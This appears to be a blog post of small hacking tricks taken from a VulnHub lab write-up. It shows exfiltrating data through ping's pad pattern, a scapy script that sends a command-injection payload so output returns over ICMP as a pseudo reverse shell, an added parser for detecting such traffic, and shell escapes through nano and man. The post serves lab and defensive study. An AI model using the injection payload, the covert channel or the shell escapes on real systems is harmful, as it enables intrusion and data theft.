A few small hacking tricks

date: 2015-12-05

ping

-p pattern  You may specify up to 16 "pad" bytes to fill out the packet you send. This is useful for diagnosing data-dependent problems in a network. For example, -p ff will cause the sent packet to be filled with all ones.

What if you have compromised a machine that can only send ping traffic outbound? -p takes care of it.

For example:

ping -c 1 -p `echo -n hello | xxd -ps` another_server

Then, on another_server, tcpdump receives the hello:

$ tcpdump -i vboxnet0 -A
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on vboxnet0, link-type EN10MB (Ethernet), capture size 262144 bytes
IP 192.168.56.102 > 192.168.56.1: ICMP echo request, id 17686, seq 1, length 64
E..T..@.@.H...8f..8...:zE......U....lohellohellohellohellohellohellohellohellohelloh
IP 192.168.56.1 > 192.168.56.102: ICMP echo reply, id 17686, seq 1, length 64
E..T.L....I...8...8f..BzE......U....lohellohellohellohellohellohellohellohellohelloh

What is this good for? A reverse shell, of course~

The script below sends an HTTP request that makes the target host send ICMP packets carrying the command output back to this machine, which gives something close to a reverse shell:

import sys
from scapy.all import sniff, ICMP, Raw
from threading import Thread
from requests import post

# The original post does not show the target URL or the form field that carries
# the injected command; both are placeholders here.
TARGET_URL = "http://TARGET_HOST/VULNERABLE_ENDPOINT"   # placeholder
PARAM_NAME = "INJECTED_PARAM"                            # placeholder

def pingListen():
  # Capture for one second. Each `ping -c 1 -p XX` from the target carries one
  # output byte repeated through the whole data area, so the last byte is enough.
  # Output produced after the one-second window is lost.
  pkts = sniff(iface="vboxnet0", timeout=1)

  for packet in pkts:
    if packet.getlayer(ICMP):
      if str(packet.getlayer(ICMP).type) == "8":   # echo requests only, not our replies
        sys.stdout.write(packet.getlayer(Raw).load[-1:].decode("latin-1"))
  sys.stdout.flush()


if __name__ == "__main__":
  while True:
    try:
      sys.stdout.write('# ')
      sys.stdout.flush()
      command = sys.stdin.readline().strip()
      thread = Thread(target=pingListen)
      thread.start()
      # Run the command on the target, hex-encode its output one byte per line,
      # and send each byte back as the pad pattern of a single ping.
      payload = "; TEST=$(%s 2>&1 | xxd -c 1 -ps); for TEST2 in $TEST; do ping -c 1 -p $TEST2 192.168.56.1; done" % command
      r = post(TARGET_URL, data={PARAM_NAME: payload})
      thread.join()
    except KeyboardInterrupt:
      break
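As an added example (not from the original post or the writeup it cites), here is the defender's side of the same trick: a pure-Python parser that tells the default Linux ping payload apart from a `ping -p` pad pattern and reassembles single-byte pads into the text that was carried, the way an analyst would over a capture. It assumes the Linux ping data layout (an 8-byte timestamp, then either the incrementing bytes 0x10, 0x11, ... or the repeated pad) and works on constructed ICMP messages rather than real traffic.

```python
import struct

ICMP_ECHO_REQUEST = 8
FAKE_TIMESTAMP = b"\x00" * 8   # stands in for the 8-byte timestamp ping puts first

def parse_icmp(msg: bytes):
    """Split a raw ICMP message (no IP header) into (type, id, seq, data)."""
    typ, _code, _csum, ident, seq = struct.unpack("!BBHHH", msg[:8])
    return typ, ident, seq, msg[8:]

def classify_echo_data(data: bytes):
    """Return ("default", None), ("pad", pattern) or ("other", None).
    Assumption: Linux ping layout, an 8-byte timestamp followed either by the
    default incrementing bytes 0x10, 0x11, ... or by the -p pattern repeated."""
    body = data[8:]
    if len(body) < 16:
        return "other", None
    if all(b == (0x10 + i) & 0xFF for i, b in enumerate(body)):
        return "default", None
    for period in range(1, 17):                 # -p accepts at most 16 pad bytes
        if all(body[i] == body[i % period] for i in range(len(body))):
            return "pad", body[:period]         # a rotation of the pad as typed
    return "other", None

def reassemble_pad_bytes(msgs):
    """Join the pad byte of every single-byte-pad echo request, in arrival order.
    Each `ping -c 1` is a fresh process (own id, seq 1), so arrival order is the
    only ordering available; this is what the post's listener prints."""
    out = []
    for msg in msgs:
        typ, _ident, _seq, data = parse_icmp(msg)
        if typ != ICMP_ECHO_REQUEST:
            continue
        kind, pattern = classify_echo_data(data)
        if kind == "pad" and len(pattern) == 1:
            out.append(pattern)
    return b"".join(out)

# ---- constructed sample messages (not captured traffic) --------------------
def make_echo(data: bytes, seq: int = 1, ident: int = 17686) -> bytes:
    return struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, ident, seq) + data

def ping_p_data(pattern: bytes, size: int = 56) -> bytes:
    """Data area as `ping -p` fills it: pattern repeated, timestamp over bytes 0-7."""
    filled = bytes(pattern[i % len(pattern)] for i in range(size))
    return FAKE_TIMESTAMP + filled[8:]

DEFAULT_DATA = FAKE_TIMESTAMP + bytes((0x10 + i) & 0xFF for i in range(48))
SAMPLE = [make_echo(DEFAULT_DATA)] + [make_echo(ping_p_data(bytes([c]))) for c in b"uid=0"]
```

On the tcpdump output above, the "lohellohello..." tail is exactly this layout: a five-byte pad that starts at data offset 0 and is then overwritten by the timestamp, so what survives from offset 8 is a rotation of the pad.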

Executing commands from nano

I think I mentioned before that man can execute commands: man -P 'commands' ls

nano also has an "interpreter" of sorts, except that this "interpreter" is a spell checker.

nano -s /bin/sh

Then type /bin/bash inside and press Ctrl+T (which runs the spell checker, i.e. /bin/sh, on the buffer contents), and you get a real bash.

You can also type other commands there for sh to execute.

Last of all

Source of the above: https://research.g0blin.co.uk/persistence-vulnhub-writeup/

The box is worth playing with; the rest of it is reversing.
